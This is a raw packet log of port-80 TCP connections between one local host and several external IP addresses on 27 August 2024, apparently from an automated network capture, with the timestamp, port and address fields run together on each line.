                                                Aug 27, 2024 07:59:22.767256975 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.867805004 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.868005037 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.873028994 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.973582983 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.989088058 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.989166021 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:22.989526033 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:22.991497993 CEST4985780192.168.11.20172.67.191.241
                                                Aug 27, 2024 07:59:23.092014074 CEST8049857172.67.191.241192.168.11.20
                                                Aug 27, 2024 07:59:28.106396914 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.206969976 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.207184076 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.217051983 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.317711115 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.482920885 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.482933998 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.483072996 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:28.483932018 CEST8049858172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:28.484055042 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:29.732459068 CEST4985880192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.749953985 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.851111889 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:30.851330042 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.858716965 CEST4985980192.168.11.20172.67.166.145
                                                Aug 27, 2024 07:59:30.959625006 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 07:59:31.128812075 CEST8049859172.67.166.145192.168.11.20
                                                Aug 27, 2024 08:00:12.761133909 CEST4987180192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:12.768650055 CEST4987180192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:13.070926905 CEST8049871154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:13.070954084 CEST8049871154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:13.071084023 CEST4987180192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:14.269567966 CEST4987180192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.286966085 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.616997957 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:15.617182016 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.625886917 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.625936031 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.625988007 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.955838919 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:15.955914021 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:15.956015110 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.956067085 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.956089020 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:15.956113100 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.956453085 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.956595898 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:15.956609964 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:15.956793070 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:15.956964016 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:16.285782099 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.285868883 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.285933971 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:16.285981894 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:16.286081076 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.286210060 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:16.286290884 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.286379099 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:16.286426067 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:16.286616087 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.286894083 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.287065029 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.287307978 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.287677050 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.287800074 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.615679026 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.615892887 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.616133928 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.616379976 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.616611958 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.616926908 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.617058992 CEST8049872154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:16.617249012 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:17.128212929 CEST4987280192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:18.145703077 CEST4987380192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:18.468573093 CEST8049873154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:18.468733072 CEST4987380192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:18.473742008 CEST4987380192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:18.796794891 CEST8049873154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:18.796854973 CEST8049873154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:18.797110081 CEST4987380192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:18.798928022 CEST4987380192.168.11.20154.23.184.207
                                                Aug 27, 2024 08:00:19.121665001 CEST8049873154.23.184.207192.168.11.20
                                                Aug 27, 2024 08:00:23.921062946 CEST4987480192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:24.160511017 CEST8049874185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:24.160774946 CEST4987480192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:24.168150902 CEST4987480192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:24.407562017 CEST8049874185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:24.459789038 CEST8049874185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:24.459800005 CEST8049874185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:24.460005999 CEST4987480192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:25.673306942 CEST4987480192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:26.690591097 CEST4987580192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:26.929775953 CEST8049875185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:26.929935932 CEST4987580192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:26.937452078 CEST4987580192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:27.176693916 CEST8049875185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:27.228481054 CEST8049875185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:27.228569031 CEST8049875185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:27.228785992 CEST4987580192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:28.438268900 CEST4987580192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.455605030 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.694722891 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.694952011 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.703767061 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.703826904 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.703881979 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.943275928 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943384886 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943422079 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.943471909 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.943502903 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943640947 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.943701982 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943746090 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943775892 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943802118 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943813086 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.943840027 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943878889 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943906069 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:29.943906069 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.944066048 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:29.944204092 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.182781935 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.182863951 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.182873011 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.182931900 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.182981014 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183047056 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183113098 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183218002 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183235884 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183245897 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183351040 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183387995 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183506012 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183515072 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183557034 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:30.183614016 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183623075 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183734894 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183861017 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183988094 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.183995962 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184004068 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184109926 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184251070 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184259892 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.184267998 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422287941 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422378063 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422386885 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422498941 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422750950 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422759056 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422766924 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422804117 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.422873020 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.423000097 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.423008919 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.423018932 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.481420994 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.481484890 CEST8049876185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:30.481689930 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:31.218888044 CEST4987680192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.236258984 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.475434065 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.475702047 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.482604980 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.721803904 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.773437023 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.773525953 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:32.773698092 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:32.775454044 CEST4987780192.168.11.20185.230.15.3
                                                Aug 27, 2024 08:00:33.014574051 CEST8049877185.230.15.3192.168.11.20
                                                Aug 27, 2024 08:00:37.783746958 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.884320021 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.884591103 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.892110109 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.992676020 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994493008 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994594097 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994605064 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.994807959 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:37.998471022 CEST8049878199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:37.998603106 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:39.404589891 CEST4987880192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.422022104 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.522794962 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.523055077 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.530560970 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.631314993 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633126974 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633229017 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633240938 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.633351088 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:40.637948990 CEST8049879199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:40.638045073 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:42.044622898 CEST4987980192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.062009096 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.162787914 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.162961960 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171567917 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171602964 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171670914 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.171843052 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272310972 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272392035 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272401094 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272478104 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272526979 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272538900 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272648096 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272672892 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272783995 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272793055 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.272794008 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272803068 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272912979 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.272984982 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.273134947 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373380899 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373477936 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373486996 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373495102 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373538017 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373600960 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373613119 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373620987 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373723030 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373744011 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373878956 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373888969 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.373900890 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.373970985 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374224901 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374234915 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374357939 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374367952 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374474049 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374602079 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374612093 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374619961 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.374653101 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474185944 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474276066 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474397898 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474409103 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474522114 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474531889 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474651098 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474661112 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474771976 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474781036 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474895954 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.474905968 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476402998 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476453066 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476505041 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:00:43.476609945 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.476609945 CEST4988080192.168.11.20199.59.243.226
                                                Aug 27, 2024 08:00:43.482640028 CEST8049880199.59.243.226192.168.11.20
                                                Aug 27, 2024 08:03:38.297841072 CEST804990196.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:38.298079014 CEST4990180192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:38.305671930 CEST4990180192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:38.441900969 CEST804990196.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:38.441915035 CEST804990196.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:38.442061901 CEST4990180192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:39.818794012 CEST4990180192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:40.839994907 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:40.972321033 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:40.972489119 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:40.983166933 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:40.983187914 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:40.983236074 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.115698099 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.115789890 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.115801096 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.115881920 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.115895987 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.115909100 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.116055012 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.116055012 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.116111040 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.116122007 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.116224051 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.116429090 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.117100000 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.162216902 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.248336077 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248465061 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.248486996 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248630047 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.248642921 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248703957 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.248722076 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248868942 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.248889923 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248902082 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248909950 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248950958 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.248959064 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.249022961 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.249044895 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.249222994 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:41.381011963 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.381180048 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.381390095 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.381638050 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.381762981 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.381892920 CEST804990296.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:41.382024050 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:42.490067005 CEST4990280192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:43.507489920 CEST4990380192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:43.640145063 CEST804990396.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:43.640326023 CEST4990380192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:43.647979975 CEST4990380192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:43.782824039 CEST804990396.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:43.782836914 CEST804990396.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:43.782847881 CEST804990396.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:43.783122063 CEST4990380192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:43.785070896 CEST4990380192.168.11.2096.126.123.244
                                                Aug 27, 2024 08:03:43.917613983 CEST804990396.126.123.244192.168.11.20
                                                Aug 27, 2024 08:03:48.787997007 CEST4990480192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:49.097496033 CEST804990423.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:49.097884893 CEST4990480192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:49.107882023 CEST4990480192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:49.418405056 CEST804990423.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:49.518903971 CEST804990423.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:49.519118071 CEST4990480192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:50.613352060 CEST4990480192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:50.922358990 CEST804990423.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:51.630650997 CEST4990580192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:51.934454918 CEST804990523.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:51.934616089 CEST4990580192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:51.942110062 CEST4990580192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:52.246617079 CEST804990523.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:52.347112894 CEST804990523.231.158.3192.168.11.20
                                                Aug 27, 2024 08:03:52.347239017 CEST4990580192.168.11.2023.231.158.3
                                                Aug 27, 2024 08:03:53.456412077 CEST4990580192.168.11.2023.231.158.3
